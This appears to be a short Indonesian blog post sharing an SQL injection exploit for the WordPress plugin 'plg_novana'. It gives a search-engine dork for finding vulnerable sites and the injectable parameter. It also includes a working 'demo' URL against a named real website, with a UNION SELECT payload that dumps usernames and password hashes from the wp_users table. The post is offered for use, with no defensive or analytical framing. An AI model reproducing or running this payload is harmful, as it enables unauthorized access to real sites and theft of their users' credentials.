Bug sqli di wordpress Plugin "plg_novana"
Exploit 0 Comments »[ type attack ]
sql injection
[ dork ]
inurl:novana_detail.php?**id=
[ exploit ]
/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql]
[ demo ]
http://avenuepattaya.net/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=-35+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users--
[ detail ]
http://1337day.com/exploit/19787
0 Responses to "Bug sqli di wordpress Plugin "plg_novana""
Posting Komentar